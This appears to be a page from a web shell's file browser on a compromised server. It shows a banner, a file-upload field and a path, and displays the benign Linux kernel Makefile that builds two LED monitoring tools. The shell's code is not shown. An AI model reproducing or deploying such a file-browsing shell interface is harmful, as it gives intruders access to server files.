MINI MINI MANI MO

Path : /lib/modules/4.18.0-553.8.1.el8_10.x86_64/source/tools/leds/
File Upload :
Current File : //lib/modules/4.18.0-553.8.1.el8_10.x86_64/source/tools/leds/Makefile

# SPDX-License-Identifier: GPL-2.0
# Makefile for LEDs tools

CFLAGS = -Wall -Wextra -g -I../../include/uapi

all: uledmon led_hw_brightness_mon
%: %.c
	$(CC) $(CFLAGS) -o $@ $^

clean:
	$(RM) uledmon led_hw_brightness_mon

.PHONY: all clean

OHA YOOOO